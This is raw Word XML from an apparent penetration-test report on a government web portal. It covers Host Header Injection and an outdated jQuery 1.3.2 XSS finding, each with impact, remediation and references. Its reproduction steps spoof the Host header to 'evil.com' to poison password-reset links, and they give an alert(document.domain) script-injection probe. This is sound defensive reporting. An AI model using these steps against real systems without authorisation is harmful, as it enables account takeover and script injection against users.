          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Web Application that constructs URLs using the Host header, such as authentication modules (password reset, email confirmation), user input processing that might generate absolute links, or internal server-side processes that perform requests based on this header. The attack surface includes any entry point where the Host header is read and used by the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E2B072" w14:textId="77FE1BD7" w:rsidR="009B7CCA" w:rsidRDefault="00877518">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D97D3CA" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Host Header Injection can have severe business consequences, potentially leading to financial losses, significant reputational damage, and regulatory non-compliance, particularly for a government entity operating under NIST CSF. Attackers can leverage this vulnerability to redirect users to malicious websites designed for phishing, leading to the theft of sensitive user credentials, personal data, or classified information. This directly impacts data confidentiality and integrity.  The potential for account takeover through poisoned password reset links can lead to unauthorized access to critical systems and data, resulting in data breaches. Such incidents can incur substantial costs related to incident response, forensic analysis, customer notification, and potential legal fees. Regulatory bodies might impose hefty fines for breaches of data privacy and security, undermining public trust and potentially disrupting critical government services. The long-term damage to the organization's reputation and its ability to maintain public confidence can be immense, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>impacting</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> its operational effectiveness and stakeholder relationships.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A4C613" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="16A34A"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404F8AA3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>STRATEGIC FIX (Architecture):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468670D9" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>- Implement a centralized input validation and sanitization layer at the application's edge (e.g., API Gateway, WAF) to rigorously check and whitelist all incoming HTTP headers, especially the Host header. This architectural control ensures that only approved domains are processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA4024F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Adopt a policy of using absolute URLs with hardcoded or configuration-defined domain names within the application, rather than relying on the Host header for URL generation, especially for security-sensitive functions like password resets or redirects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F9637E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Ensure all application components, including those built with Struts 1, adhere to a secure coding standard that mandates explicit validation of all untrusted input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6ACDF6" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="009B7CCA">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="726C3380" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TACTICAL FIX (Code Implementation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C00AD3C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Validate the Host header against a predefined whitelist of legitimate domain names. If the Host header does not match an allowed domain, the request should be rejected or an error should be logged, or a default legitimate Host should be enforced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0102BAD5" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- For URL generation, replace dynamic reliance on the Host header with statically configured, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>known</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-good domain names for absolute URLs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C61D4C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Configure web servers (e.g., Apache, Nginx) or proxies to only process requests with a valid Host header, effectively dropping or redirecting requests with unknown hosts before they reach the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5ED4FD" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Ensure that redirects (301, 302) use absolute URLs with a hardcoded domain instead of relative URLs or URLs derived from the Host header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701DADD2" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA24F2B" w14:textId="54F5C6B3" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Identify a web application function that generates absolute URLs or uses the Host header in its logic. Common examples include password reset functionality, email verification links, or redirects. 2. Using a web proxy tool (e.g., Burp Suite), intercept an HTTP request to the target </w:t>
      </w:r>
      <w:r w:rsidR="00877518">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VSPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Web Application. 3. Modify the 'Host' header in the intercepted request to an attacker-controlled domain (e.g., 'evil.com' or 'phishing.example.org'). Ensure the 'X-Forwarded-Host' header is also set to the malicious domain if proxies are in use. 4. Forward the modified request to the server. 5. Observe the application's response, especially for any generated links in the HTML response, email content (if testing password reset), or redirect locations. Look for instances where the attacker-controlled domain is reflected in the generated URL. 6. For instance, if testing a password reset, trigger the password reset process while injecting the malicious Host header. Check the password reset email for a link pointing to the attacker-controlled domain instead of the legitimate application domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C40475" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="0369A1"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0369A1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EBBC31" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://owasp.org/Top10/A03_2021-Injection/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069F8CC7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://cwe.mitre.org/data/definitions/113.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E87434" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://portswigger.net/web-security/http-response-splitting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBEB46D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://nvd.nist.gov/vuln/detail/CVE-2007-0091</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581C82A7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://nvd.nist.gov/vuln/detail/CVE-2006-5757</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CD1E54" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5011584D"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38BC28A6"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44756F5E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Vulnerable and Outdated JavaScript Library (jQuery 1.3.2)</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683E4A7A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>HIGH CVSS 6.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25704B96"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735D0B35"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01086D1"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510EB25" w14:textId="26E9694D"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021</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519E7E0"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DE1328C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6.1 (Medium)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="516CD90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383F540"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86481FA" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A06:2021-Vulnerable and Outdated Components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2DB129D"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965CCC0" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-79</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="15673A0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7CF0EB3"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73E077"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176FD3D"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DDD5FD" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="7F690B8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42A06C5"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B528071"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71656D4"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F0DCC71" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="36D9B945"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BED0DD7"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038E76B"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212C685"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5569D35" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="6930F77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9A55CB0" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE References</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4250" w:type="pct"/>
            <w:gridSpan w:val="3"/>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tcPr>
          <w:p w14:paraId="37E1B6DC" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>https://nvd.nist.gov/vuln/detail/CVE-2015-9251, https://nvd.nist.gov/vuln/detail/CVE-2012-6708</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1692F032" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="4F46E5"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E155EB8" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The application utilizes an outdated version of the jQuery JavaScript library, specifically version 1.3.2. This version is known to contain multiple security vulnerabilities, most notably Cross-Site Scripting (XSS) issues. Outdated client-side libraries can introduce a significant attack surface to web applications. Exploitation typically occurs when untrusted data is processed or displayed by the vulnerable library without adequate sanitization, leading to the execution of arbitrary JavaScript in the context of the user's browser. An attacker could craft a malicious input that, when processed by the vulnerable jQuery library, would execute malicious script on the client side. This could allow for session hijacking, defacement of the website, redirection to malicious sites, or data exfiltration. The affected components include any web pages or client-side functionality that loads and executes the vulnerable jQuery 1.3.2 library.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DF874B" w14:textId="240C2D1C" w:rsidR="009B7CCA" w:rsidRDefault="00877518">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5628E6" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The use of vulnerable and outdated software components poses a significant risk to the organization, potentially leading to severe financial and reputational </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>damages</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. If exploited, an attacker could gain unauthorized access to user sessions, leading to the theft of sensitive personal or corporate data. This could result in substantial financial losses due to data breach incident response, legal fees, and potential regulatory fines under compliance requirements like NIST CSF, which mandates secure system configurations. Furthermore, a successful attack could erode customer trust, damage the organization's reputation, and disrupt essential business operations, impacting revenue and stakeholder confidence. The integrity of data handled by the portal could also be compromised, leading to unreliable information and erroneous decision-making.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6C0BE5" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="16A34A"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E113246" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>STRATEGIC FIX (Architecture): Implement a robust Software Composition Analysis (SCA) solution to continuously monitor and identify all third-party libraries and their versions used across the application portfolio. Establish a policy for regular security patching and upgrading of all third-party components to their latest stable and secure versions. Prioritize the retirement of deprecated or unmaintained libraries. Integrate security into the Software Development Life Cycle (SDLC) to ensure all new components are vetted for vulnerabilities before deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C2785A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="009B7CCA">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="138FF522" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">TACTICAL FIX (Code Implementation): Immediately upgrade the jQuery library from version 1.3.2 to the latest stable and secure version available (e.g., jQuery 3.x or higher). Ensure that all user-supplied input is properly validated, sanitized, and encoded on the server-side before being rendered on the client-side. Implement a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Content Security Policy (CSP) to restrict the sources from which client-side scripts can be loaded and executed, thereby mitigating the impact of potential XSS vulnerabilities. Review all client-side code that interacts with the DOM or handles untrusted data to ensure secure coding practices are followed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BBC410" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025D61D3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1. Identify a web page within the gov portal that loads jQuery version 1.3.2. 2. Locate an input field or URL parameter that is reflected unencoded in the HTML content, particularly in a context where the vulnerable jQuery library might process it (e.g., dynamically updating parts of the page). 3. Craft a malicious payload, for example: "&gt;&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>document.domain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)&lt;/script&gt; 4. Inject the payload into the vulnerable input field or URL parameter. 5. Observe if the script executes in the browser, indicated by an alert box displaying the domain, or other signs of arbitrary JavaScript execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537E7E1E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="0369A1"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0369A1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B93405" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://owasp.org/Top10/A06_2021-Vulnerable_and_Outdated_Components/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0D7C9A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://cwe.mitre.org/data/definitions/79.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72722983" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://nvd.nist.gov/vuln/detail/CVE-2015-9251</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AF7350" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://portswigger.net/web-security/cross-site-scripting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E78D1F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://nvd.nist.gov/vuln/detail/CVE-2012-6708</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1D9590" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFF6ABC"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0D463CE5"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7DAE9BB0" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Vulnerable and Outdated JavaScript Library (jQuery)</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2E97B6A2" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>HIGH CVSS 7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5A9AE113"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22146C1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2B9857A"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423831" w14:textId="04004C70"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-017</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1728359"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125CC1F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7.5 (High)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="79D32CA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484B736"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2753857" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A06:2021-Vulnerable and Outdated Components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5FF6020"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11766E6" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
